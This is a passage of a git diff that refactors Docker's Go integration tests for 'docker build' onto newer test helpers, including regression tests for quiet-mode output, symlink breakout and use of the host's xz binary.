ctx, true, "-q", "--force-rm", "--rm") + BuildFunc: func(name string) *icmd.Result { + return buildImage(name, buildFlags, build.WithBuildContext(c, + build.WithFile("Dockerfile", "FROM busybox"), + build.WithFile("quiet_build_success_fctx", "test"), + )) }, }, { Name: "quiet_build_git_success", - BuildFunc: func(name string) { - git, err := newFakeGit("repo", map[string]string{ + BuildFunc: func(name string) *icmd.Result { + git := fakegit.New(c, "repo", map[string]string{ "Dockerfile": "FROM busybox", }, true) - if err != nil { - c.Fatalf("Failed to create the git repo: %s", err.Error()) - } - defer git.Close() - _, stdout, stderr, err = buildImageFromGitWithStdoutStderr(name, git, true, "-q", "--force-rm", "--rm") - + return buildImage(name, buildFlags, build.WithContextPath(git.RepoURL)) }, }, } for _, te := range tt { - te.BuildFunc(te.Name) - if err != nil { - c.Fatalf("Test %s shouldn't fail, but got the following error: %s", te.Name, err.Error()) - } - if outRegexp.Find([]byte(stdout)) == nil { - c.Fatalf("Test %s expected stdout to match the [%v] regexp, but it is [%v]", te.Name, outRegexp, stdout) + result := te.BuildFunc(te.Name) + result.Assert(c, icmd.Success) + if outRegexp.Find([]byte(result.Stdout())) == nil { + c.Fatalf("Test %s expected stdout to match the [%v] regexp, but it is [%v]", te.Name, outRegexp, result.Stdout()) } - if stderr != "" { - c.Fatalf("Test %s expected stderr to be empty, but it is [%#v]", te.Name, stderr) + if result.Stderr() != "" { + c.Fatalf("Test %s expected stderr to be empty, but it is [%#v]", te.Name, result.Stderr()) } } } +// FIXME(vdemeester) migrate to docker/cli tests func (s *DockerSuite) TestBuildNotVerboseFailureWithNonExistImage(c *check.C) { // This test makes sure that -q works correctly when build fails by // comparing between the stderr output in quiet mode and in stdout // and stderr output in verbose mode testRequires(c, Network) testName := "quiet_build_not_exists_image" - buildCmd := "FROM busybox11" - _, _, qstderr, qerr := buildImageWithStdoutStderr(testName, buildCmd, false, "-q", "--force-rm", "--rm") - _, vstdout, vstderr, verr := buildImageWithStdoutStderr(testName, buildCmd, false, "--force-rm", "--rm") - if verr == nil || qerr == nil { - c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", testName)) - } - if qstderr != vstdout+vstderr { - c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", testName, qstderr, vstdout+vstderr)) + dockerfile := "FROM busybox11" + quietResult := buildImage(testName, cli.WithFlags("-q"), build.WithDockerfile(dockerfile)) + quietResult.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + result := buildImage(testName, build.WithDockerfile(dockerfile)) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + if quietResult.Stderr() != result.Combined() { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", testName, quietResult.Stderr(), result.Combined())) } } +// FIXME(vdemeester) migrate to docker/cli tests func (s *DockerSuite) TestBuildNotVerboseFailure(c *check.C) { // This test makes sure that -q works correctly when build fails by // comparing between the stderr output in quiet mode and in stdout // and stderr output in verbose mode - tt := []struct { - TestName string - BuildCmds string + testCases := []struct { + testName string + dockerfile string }{ {"quiet_build_no_from_at_the_beginning", "RUN whoami"}, {"quiet_build_unknown_instr", "FROMD busybox"}, } - for _, te := range tt { - _, _, qstderr, qerr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "-q", "--force-rm", "--rm") - _, vstdout, vstderr, verr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "--force-rm", "--rm") - if verr == nil || qerr == nil { - c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", te.TestName)) - } - if qstderr != vstdout+vstderr { - c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", te.TestName, qstderr, vstdout+vstderr)) + for _, tc := range testCases { + quietResult := buildImage(tc.testName, cli.WithFlags("-q"), build.WithDockerfile(tc.dockerfile)) + quietResult.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + result := buildImage(tc.testName, build.WithDockerfile(tc.dockerfile)) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + if quietResult.Stderr() != result.Combined() { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", tc.testName, quietResult.Stderr(), result.Combined())) } } } +// FIXME(vdemeester) migrate to docker/cli tests func (s *DockerSuite) TestBuildNotVerboseFailureRemote(c *check.C) { // This test ensures that when given a wrong URL, stderr in quiet mode and // stderr in verbose mode are identical. // TODO(vdemeester) with cobra, stdout has a carriage return too much so this test should not check stdout URL := "http://something.invalid" - Name := "quiet_build_wrong_remote" - _, _, qstderr, qerr := buildImageWithStdoutStderr(Name, "", false, "-q", "--force-rm", "--rm", URL) - _, _, vstderr, verr := buildImageWithStdoutStderr(Name, "", false, "--force-rm", "--rm", URL) - if qerr == nil || verr == nil { - c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", Name)) + name := "quiet_build_wrong_remote" + quietResult := buildImage(name, cli.WithFlags("-q"), build.WithContextPath(URL)) + quietResult.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + result := buildImage(name, build.WithContextPath(URL)) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + + // An error message should contain name server IP and port, like this: + // "dial tcp: lookup something.invalid on 172.29.128.11:53: no such host" + // The IP:port need to be removed in order to not trigger a test failur + // when more than one nameserver is configured. + // While at it, also strip excessive newlines. + normalize := func(msg string) string { + return strings.TrimSpace(regexp.MustCompile("[1-9][0-9.]+:[0-9]+").ReplaceAllLiteralString(msg, "")) } - if qstderr != vstderr { - c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", Name, qstderr, vstderr)) + + if normalize(quietResult.Stderr()) != normalize(result.Combined()) { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", name, quietResult.Stderr(), result.Combined())) } } +// FIXME(vdemeester) migrate to docker/cli tests func (s *DockerSuite) TestBuildStderr(c *check.C) { // This test just makes sure that no non-error output goes // to stderr name := "testbuildstderr" - _, _, stderr, err := buildImageWithStdoutStderr(name, - "FROM busybox\nRUN echo one", true) - if err != nil { - c.Fatal(err) + result := buildImage(name, build.WithDockerfile("FROM busybox\nRUN echo one")) + result.Assert(c, icmd.Success) + + // Windows to non-Windows should have a security warning + if runtime.GOOS == "windows" && testEnv.OSType != "windows" && !strings.Contains(result.Stdout(), "SECURITY WARNING:") { + c.Fatalf("Stdout contains unexpected output: %q", result.Stdout()) } - if runtime.GOOS == "windows" && - daemonPlatform != "windows" { - // Windows to non-Windows should have a security warning - if !strings.Contains(stderr, "SECURITY WARNING:") { - c.Fatalf("Stderr contains unexpected output: %q", stderr) - } - } else { - // Other platform combinations should have no stderr written too - if stderr != "" { - c.Fatalf("Stderr should have been empty, instead it's: %q", stderr) - } + // Stderr should always be empty + if result.Stderr() != "" { + c.Fatalf("Stderr should have been empty, instead it's: %q", result.Stderr()) } } func (s *DockerSuite) TestBuildChownSingleFile(c *check.C) { - testRequires(c, UnixCli) // test uses chown: not available on windows - testRequires(c, DaemonIsLinux) + testRequires(c, UnixCli, DaemonIsLinux) // test uses chown: not available on windows name := "testbuildchownsinglefile" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox COPY test / RUN ls -l /test RUN [ $(ls -l /test | awk '{print $3":"$4}') = 'root:root' ] -`, map[string]string{ - "test": "test", - }) - if err != nil { - c.Fatal(err) - } +`), + fakecontext.WithFiles(map[string]string{ + "test": "test", + })) defer ctx.Close() if err := os.Chown(filepath.Join(ctx.Dir, "test"), 4242, 4242); err != nil { c.Fatal(err) } - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) } func (s *DockerSuite) TestBuildSymlinkBreakout(c *check.C) { @@ -4733,9 +3642,8 @@ func (s *DockerSuite) TestBuildSymlinkBreakout(c *check.C) { }) w.Close() f.Close() - if _, err := buildImageFromContext(name, fakeContextFromDir(ctx), false); err != nil { - c.Fatal(err) - } + + buildImageSuccessfully(c, name, build.WithoutCache, build.WithExternalBuildContext(fakecontext.New(c, ctx))) if _, err := os.Lstat(filepath.Join(tmpdir, "inject")); err == nil { c.Fatal("symlink breakout - inject") } else if !os.IsNotExist(err) { @@ -4749,28 +3657,16 @@ func (s *DockerSuite) TestBuildXZHost(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildxzhost" - ctx, err := fakeContext(` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM busybox ADD xz /usr/local/sbin/ RUN chmod 755 /usr/local/sbin/xz ADD test.xz / -RUN [ ! -e /injected ]`, - map[string]string{ - "test.xz": "\xfd\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00" + - "\x21\x01\x16\x00\x00\x00\x74\x2f\xe5\xa3\x01\x00\x3f\xfd" + - "\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00\x21", - "xz": "#!/bin/sh\ntouch /injected", - }) - - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - +RUN [ ! -e /injected ]`), + build.WithFile("test.xz", "\xfd\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00"+"\x21\x01\x16\x00\x00\x00\x74\x2f\xe5\xa3\x01\x00\x3f\xfd"+"\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00\x21"), + build.WithFile("xz", "#!/bin/sh\ntouch /injected"), + )) } func (s *DockerSuite) TestBuildVolumesRetainContents(c *check.C) { @@ -4783,26 +3679,18 @@ func (s *DockerSuite) TestBuildVolumesRetainContents(c *check.C) { volName = "/foo" ) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volName = "C:/foo" } - ctx, err := fakeContext(` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM busybox COPY content /foo/file VOLUME `+volName+` -CMD cat /foo/file`, - map[string]string{ - "content": expected, - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, false); err != nil { - c.Fatal(err) - } +CMD cat /foo/file`), + build.WithFile("content", expected), + )) out, _ := dockerCmd(c, "run", "--rm", name) if out != expected { @@ -4811,220 +3699,78 @@ CMD cat /foo/file`, } -func (s *DockerSuite) TestBuildRenamedDockerfile(c *check.C) { - - ctx, err := fakeContext(`FROM busybox - RUN echo from Dockerfile`, - map[string]string{ - "Dockerfile": "FROM busybox\nRUN echo from Dockerfile", - "files/Dockerfile": "FROM busybox\nRUN echo from files/Dockerfile", - "files/dFile": "FROM busybox\nRUN echo from files/dFile", - "dFile": "FROM busybox\nRUN echo from dFile", - "files/dFile2": "FROM busybox\nRUN echo from files/dFile2", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") - if err != nil { - c.Fatalf("Failed to build: %s\n%s", out, err) - } - if !strings.Contains(out, "from Dockerfile") { - c.Fatalf("test1 should have used Dockerfile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-f", filepath.Join("files", "Dockerfile"), "-t", "test2", ".") - if err != nil { - c.Fatal(err) - } - if !strings.Contains(out, "from files/Dockerfile") { - c.Fatalf("test2 should have used files/Dockerfile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", filepath.Join("files", "dFile")), "-t", "test3", ".") - if err != nil { - c.Fatal(err) - } - if !strings.Contains(out, "from files/dFile") { - c.Fatalf("test3 should have used files/dFile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--file=dFile", "-t", "test4", ".") - if err != nil { - c.Fatal(err) - } - if !strings.Contains(out, "from dFile") { - c.Fatalf("test4 should have used dFile, output:%s", out) - } - - dirWithNoDockerfile, err := ioutil.TempDir(os.TempDir(), "test5") - c.Assert(err, check.IsNil) - nonDockerfileFile := filepath.Join(dirWithNoDockerfile, "notDockerfile") - if _, err = os.Create(nonDockerfileFile); err != nil { - c.Fatal(err) - } - out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", nonDockerfileFile), "-t", "test5", ".") - - if err == nil { - c.Fatalf("test5 was supposed to fail to find passwd") - } - - if expected := fmt.Sprintf("The Dockerfile (%s) must be within the build context (.)", nonDockerfileFile); !strings.Contains(out, expected) { - c.Fatalf("wrong error message:%v\nexpected to contain=%v", out, expected) - } - - out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test6", "..") - if err != nil { - c.Fatalf("test6 failed: %s", err) - } - if !strings.Contains(out, "from Dockerfile") { - c.Fatalf("test6 should have used root Dockerfile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join(ctx.Dir, "files", "Dockerfile"), "-t", "test7", "..") - if err != nil { - c.Fatalf("test7 failed: %s", err) - } - if !strings.Contains(out, "from files/Dockerfile") { - c.Fatalf("test7 should have used files Dockerfile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test8", ".") - if err == nil || !strings.Contains(out, "must be within the build context") { - c.Fatalf("test8 should have failed with Dockerfile out of context: %s", err) - } - - tmpDir := os.TempDir() - out, _, err = dockerCmdInDir(c, tmpDir, "build", "-t", "test9", ctx.Dir) - if err != nil { - c.Fatalf("test9 - failed: %s", err) - } - if !strings.Contains(out, "from Dockerfile") { - c.Fatalf("test9 should have used root Dockerfile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", "dFile2", "-t", "test10", ".") - if err != nil { - c.Fatalf("test10 should have worked: %s", err) - } - if !strings.Contains(out, "from files/dFile2") { - c.Fatalf("test10 should have used files/dFile2, output:%s", out) - } - -} - func (s *DockerSuite) TestBuildFromMixedcaseDockerfile(c *check.C) { testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows testRequires(c, DaemonIsLinux) - ctx, err := fakeContext(`FROM busybox - RUN echo from dockerfile`, - map[string]string{ - "dockerfile": "FROM busybox\nRUN echo from dockerfile", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") - if err != nil { - c.Fatalf("Failed to build: %s\n%s", out, err) - } - - if !strings.Contains(out, "from dockerfile") { - c.Fatalf("Missing proper output: %s", out) - } - -} - -func (s *DockerSuite) TestBuildWithTwoDockerfiles(c *check.C) { - testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows - testRequires(c, DaemonIsLinux) - - ctx, err := fakeContext(`FROM busybox -RUN echo from Dockerfile`, - map[string]string{ - "dockerfile": "FROM busybox\nRUN echo from dockerfile", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") - if err != nil { - c.Fatalf("Failed to build: %s\n%s", out, err) - } - - if !strings.Contains(out, "from Dockerfile") { - c.Fatalf("Missing proper output: %s", out) - } + // If Dockerfile is not present, use dockerfile + buildImage("test1", build.WithBuildContext(c, + build.WithFile("dockerfile", `FROM busybox + RUN echo from dockerfile`), + )).Assert(c, icmd.Expected{ + Out: "from dockerfile", + }) + // Prefer Dockerfile in place of dockerfile + buildImage("test1", build.WithBuildContext(c, + build.WithFile("dockerfile", `FROM busybox + RUN echo from dockerfile`), + build.WithFile("Dockerfile", `FROM busybox + RUN echo from Dockerfile`), + )).Assert(c, icmd.Expected{ + Out: "from Dockerfile", + }) } +// FIXME(vdemeester) should migrate to docker/cli tests func (s *DockerSuite) TestBuildFromURLWithF(c *check.C) { - server, err := fakeStorage(map[string]string{"baz": `FROM busybox + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{"baz": `FROM busybox RUN echo from baz COPY * /tmp/ -RUN find /tmp/`}) - if err != nil { - c.Fatal(err) - } +RUN find /tmp/`})) defer server.Close() - ctx, err := fakeContext(`FROM busybox -RUN echo from Dockerfile`, - map[string]string{}) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox + RUN echo from Dockerfile`)) defer ctx.Close() // Make sure that -f is ignored and that we don't use the Dockerfile // that's in the current dir - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-f", "baz", "-t", "test1", server.URL()+"/baz") - if err != nil { - c.Fatalf("Failed to build: %s\n%s", out, err) - } + result := cli.BuildCmd(c, "test1", cli.WithFlags("-f", "baz", server.URL()+"/baz"), func(cmd *icmd.Cmd) func() { + cmd.Dir = ctx.Dir + return nil + }) - if !strings.Contains(out, "from baz") || - strings.Contains(out, "/tmp/baz") || - !strings.Contains(out, "/tmp/Dockerfile") { - c.Fatalf("Missing proper output: %s", out) + if !strings.Contains(result.Combined(), "from baz") || + strings.Contains(result.Combined(), "/tmp/baz") || + !strings.Contains(result.Combined(), "/tmp/Dockerfile") { + c.Fatalf("Missing proper output: %s", result.Combined()) } } +// FIXME(vdemeester) should migrate to docker/cli tests func (s *DockerSuite) TestBuildFromStdinWithF(c *check.C) { testRequires(c, DaemonIsLinux) // TODO Windows: This test is flaky; no idea why - ctx, err := fakeContext(`FROM busybox -RUN echo "from Dockerfile"`, - map[string]string{}) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox +RUN echo "from Dockerfile"`)) defer ctx.Close() // Make sure that -f is ignored and that we don't use the Dockerfile // that's in the current dir - dockerCommand := exec.Command(dockerBinary, "build", "-f", "baz", "-t", "test1", "-") - dockerCommand.Dir = ctx.Dir - dockerCommand.Stdin = strings.NewReader(`FROM busybox + result := cli.BuildCmd(c, "test1", cli.WithFlags("-f", "baz", "-"), func(cmd *icmd.Cmd) func() { + cmd.Dir = ctx.Dir + cmd.Stdin = strings.NewReader(`FROM busybox RUN echo "from baz" COPY * /tmp/ RUN sh -c "find /tmp/" # sh -c is needed on Windows to use the correct find`) - out, status, err := runCommandWithOutput(dockerCommand) - if err != nil || status != 0 { - c.Fatalf("Error building: %s", err) - } + return nil + }) - if !strings.Contains(out, "from baz") || - strings.Contains(out, "/tmp/baz") || - !strings.Contains(out, "/tmp/Dockerfile") { - c.Fatalf("Missing proper output: %s", out) + if !strings.Contains(result.Combined(), "from baz") || + strings.Contains(result.Combined(), "/tmp/baz") || + !strings.Contains(result.Combined(), "/tmp/Dockerfile") { + c.Fatalf("Missing proper output: %s", result.Combined()) } } @@ -5041,136 +3787,71 @@ func (s *DockerSuite) TestBuildFromOfficialNames(c *check.C) { } for idx, fromName := range fromNames { imgName := fmt.Sprintf("%s%d", name, idx) - _, err := buildImage(imgName, "FROM "+fromName, true) - if err != nil { - c.Errorf("Build failed using FROM %s: %s", fromName, err) - } - deleteImages(imgName) + buildImageSuccessfully(c, imgName, build.WithDockerfile("FROM "+fromName)) + dockerCmd(c, "rmi", imgName) } } -func (s *DockerSuite) TestBuildDockerfileOutsideContext(c *check.C) { - testRequires(c, UnixCli) // uses os.Symlink: not implemented in windows at the time of writing (go-1.4.2) - testRequires(c, DaemonIsLinux) +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestBuildSpaces(c *check.C) { + // Test to make sure that leading/trailing spaces on a command + // doesn't change the error msg we get + name := "testspaces" + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile("FROM busybox\nCOPY\n")) + defer ctx.Close() - name := "testbuilddockerfileoutsidecontext" - tmpdir, err := ioutil.TempDir("", name) - c.Assert(err, check.IsNil) - defer os.RemoveAll(tmpdir) - ctx := filepath.Join(tmpdir, "context") - if err := os.MkdirAll(ctx, 0755); err != nil { - c.Fatal(err) + result1 := cli.Docker(cli.Build(name), build.WithExternalBuildContext(ctx)) + result1.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + + ctx.Add("Dockerfile", "FROM busybox\nCOPY ") + result2 := cli.Docker(cli.Build(name), build.WithExternalBuildContext(ctx)) + result2.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + + removeLogTimestamps := func(s string) string { + return regexp.MustCompile(`time="(.*?)"`).ReplaceAllString(s, `time=[TIMESTAMP]`) } - if err := ioutil.WriteFile(filepath.Join(ctx, "Dockerfile"), []byte("FROM scratch\nENV X Y"), 0644); err != nil { - c.Fatal(err) - } - wd, err := os.Getwd() - if err != nil { - c.Fatal(err) - } - defer os.Chdir(wd) - if err := os.Chdir(ctx); err != nil { - c.Fatal(err) - } - if err := ioutil.WriteFile(filepath.Join(tmpdir, "outsideDockerfile"), []byte("FROM scratch\nENV x y"), 0644); err != nil { - c.Fatal(err) - } - if err := os.Symlink(filepath.Join("..", "outsideDockerfile"), filepath.Join(ctx, "dockerfile1")); err != nil { - c.Fatal(err) - } - if err := os.Symlink(filepath.Join(tmpdir, "outsideDockerfile"), filepath.Join(ctx, "dockerfile2")); err != nil { - c.Fatal(err) - } - - for _, dockerfilePath := range []string{ - filepath.Join("..", "outsideDockerfile"), - filepath.Join(ctx, "dockerfile1"), - filepath.Join(ctx, "dockerfile2"), - } { - result := dockerCmdWithResult("build", "-t", name, "--no-cache", "-f", dockerfilePath, ".") - c.Assert(result, icmd.Matches, icmd.Expected{ - Err: "must be within the build context", - ExitCode: 1, - }) - deleteImages(name) - } - - os.Chdir(tmpdir) - - // Path to Dockerfile should be resolved relative to working directory, not relative to context. - // There is a Dockerfile in the context, but since there is no Dockerfile in the current directory, the following should fail - out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "Dockerfile", ctx) - if err == nil { - c.Fatalf("Expected error. Out: %s", out) - } -} - -func (s *DockerSuite) TestBuildSpaces(c *check.C) { - // Test to make sure that leading/trailing spaces on a command - // doesn't change the error msg we get - var ( - err1 error - err2 error - ) - - name := "testspaces" - ctx, err := fakeContext("FROM busybox\nCOPY\n", - map[string]string{ - "Dockerfile": "FROM busybox\nCOPY\n", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err1 = buildImageFromContext(name, ctx, false); err1 == nil { - c.Fatal("Build 1 was supposed to fail, but didn't") - } - - ctx.Add("Dockerfile", "FROM busybox\nCOPY ") - if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { - c.Fatal("Build 2 was supposed to fail, but didn't") - } - - removeLogTimestamps := func(s string) string { - return regexp.MustCompile(`time="(.*?)"`).ReplaceAllString(s, `time=[TIMESTAMP]`) - } - - // Skip over the times - e1 := removeLogTimestamps(err1.Error()) - e2 := removeLogTimestamps(err2.Error()) - - // Ignore whitespace since that's what were verifying doesn't change stuff - if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { - c.Fatalf("Build 2's error wasn't the same as build 1's\n1:%s\n2:%s", err1, err2) + + // Skip over the times + e1 := removeLogTimestamps(result1.Error.Error()) + e2 := removeLogTimestamps(result2.Error.Error()) + + // Ignore whitespace since that's what were verifying doesn't change stuff + if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { + c.Fatalf("Build 2's error wasn't the same as build 1's\n1:%s\n2:%s", result1.Error, result2.Error) } ctx.Add("Dockerfile", "FROM busybox\n COPY") - if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { - c.Fatal("Build 3 was supposed to fail, but didn't") - } + result2 = cli.Docker(cli.Build(name), build.WithoutCache, build.WithExternalBuildContext(ctx)) + result2.Assert(c, icmd.Expected{ + ExitCode: 1, + }) // Skip over the times - e1 = removeLogTimestamps(err1.Error()) - e2 = removeLogTimestamps(err2.Error()) + e1 = removeLogTimestamps(result1.Error.Error()) + e2 = removeLogTimestamps(result2.Error.Error()) // Ignore whitespace since that's what were verifying doesn't change stuff if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { - c.Fatalf("Build 3's error wasn't the same as build 1's\n1:%s\n3:%s", err1, err2) + c.Fatalf("Build 3's error wasn't the same as build 1's\n1:%s\n3:%s", result1.Error, result2.Error) } ctx.Add("Dockerfile", "FROM busybox\n COPY ") - if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { - c.Fatal("Build 4 was supposed to fail, but didn't") - } + result2 = cli.Docker(cli.Build(name), build.WithoutCache, build.WithExternalBuildContext(ctx)) + result2.Assert(c, icmd.Expected{ + ExitCode: 1, + }) // Skip over the times - e1 = removeLogTimestamps(err1.Error()) - e2 = removeLogTimestamps(err2.Error()) + e1 = removeLogTimestamps(result1.Error.Error()) + e2 = removeLogTimestamps(result2.Error.Error()) // Ignore whitespace since that's what were verifying doesn't change stuff if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { - c.Fatalf("Build 4's error wasn't the same as build 1's\n1:%s\n4:%s", err1, err2) + c.Fatalf("Build 4's error wasn't the same as build 1's\n1:%s\n4:%s", result1.Error, result2.Error) } } @@ -5183,39 +3864,31 @@ func (s *DockerSuite) TestBuildSpacesWithQuotes(c *check.C) { RUN echo " \ foo "` - _, out, err := buildImageWithOut(name, dockerfile, false) - if err != nil { - c.Fatal("Build failed:", err) - } - - expecting := "\n foo \n" + expected := "\n foo \n" // Windows uses the builtin echo, which preserves quotes - if daemonPlatform == "windows" { - expecting = "\" foo \"" - } - if !strings.Contains(out, expecting) { - c.Fatalf("Bad output: %q expecting to contain %q", out, expecting) + if testEnv.OSType == "windows" { + expected = "\" foo \"" } + buildImage(name, build.WithDockerfile(dockerfile)).Assert(c, icmd.Expected{ + Out: expected, + }) } // #4393 func (s *DockerSuite) TestBuildVolumeFileExistsinContainer(c *check.C) { testRequires(c, DaemonIsLinux) // TODO Windows: This should error out - buildCmd := exec.Command(dockerBinary, "build", "-t", "docker-test-errcreatevolumewithfile", "-") - buildCmd.Stdin = strings.NewReader(` + buildImage("docker-test-errcreatevolumewithfile", build.WithDockerfile(` FROM busybox RUN touch /foo VOLUME /foo - `) - - out, _, err := runCommandWithOutput(buildCmd) - if err == nil || !strings.Contains(out, "file exists") { - c.Fatalf("expected build to fail when file exists in container at requested volume path") - } - + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "file exists", + }) } +// FIXME(vdemeester) should be a unit test func (s *DockerSuite) TestBuildMissingArgs(c *check.C) { // Test to make sure that all Dockerfile commands (except the ones listed // in skipCmds) will generate an error if no args are provided. @@ -5227,7 +3900,7 @@ func (s *DockerSuite) TestBuildMissingArgs(c *check.C) { "INSERT": {}, } - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { skipCmds = map[string]struct{}{ "CMD": {}, "RUN": {}, @@ -5245,7 +3918,6 @@ func (s *DockerSuite) TestBuildMissingArgs(c *check.C) { if _, ok := skipCmds[cmd]; ok { continue } - var dockerfile string if cmd == "FROM" { dockerfile = cmd @@ -5254,148 +3926,104 @@ func (s *DockerSuite) TestBuildMissingArgs(c *check.C) { dockerfile = "FROM busybox\n" + cmd } - ctx, err := fakeContext(dockerfile, map[string]string{}) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - var out string - if out, err = buildImageFromContext("args", ctx, true); err == nil { - c.Fatalf("%s was supposed to fail. Out:%s", cmd, out) - } - if !strings.Contains(err.Error(), cmd+" requires") { - c.Fatalf("%s returned the wrong type of error:%s", cmd, err) - } + buildImage("args", build.WithDockerfile(dockerfile)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: cmd + " requires", + }) } } func (s *DockerSuite) TestBuildEmptyScratch(c *check.C) { testRequires(c, DaemonIsLinux) - _, out, err := buildImageWithOut("sc", "FROM scratch", true) - if err == nil { - c.Fatalf("Build was supposed to fail") - } - if !strings.Contains(out, "No image was generated") { - c.Fatalf("Wrong error message: %v", out) - } + buildImage("sc", build.WithDockerfile("FROM scratch")).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "No image was generated", + }) } func (s *DockerSuite) TestBuildDotDotFile(c *check.C) { - ctx, err := fakeContext("FROM busybox\n", - map[string]string{ - "..gitme": "", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err = buildImageFromContext("sc", ctx, false); err != nil { - c.Fatalf("Build was supposed to work: %s", err) - } + buildImageSuccessfully(c, "sc", build.WithBuildContext(c, + build.WithFile("Dockerfile", "FROM busybox\n"), + build.WithFile("..gitme", ""), + )) } func (s *DockerSuite) TestBuildRUNoneJSON(c *check.C) { testRequires(c, DaemonIsLinux) // No hello-world Windows image name := "testbuildrunonejson" - ctx, err := fakeContext(`FROM hello-world:frozen -RUN [ "/hello" ]`, map[string]string{}) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "-t", name, ".") - if err != nil { - c.Fatalf("failed to build the image: %s, %v", out, err) - } - - if !strings.Contains(out, "Hello from Docker") { - c.Fatalf("bad output: %s", out) - } - + buildImage(name, build.WithDockerfile(`FROM hello-world:frozen +RUN [ "/hello" ]`)).Assert(c, icmd.Expected{ + Out: "Hello from Docker", + }) } func (s *DockerSuite) TestBuildEmptyStringVolume(c *check.C) { name := "testbuildemptystringvolume" - _, err := buildImage(name, ` + buildImage(name, build.WithDockerfile(` FROM busybox ENV foo="" VOLUME $foo - `, false) - if err == nil { - c.Fatal("Should have failed to build") - } - + `)).Assert(c, icmd.Expected{ + ExitCode: 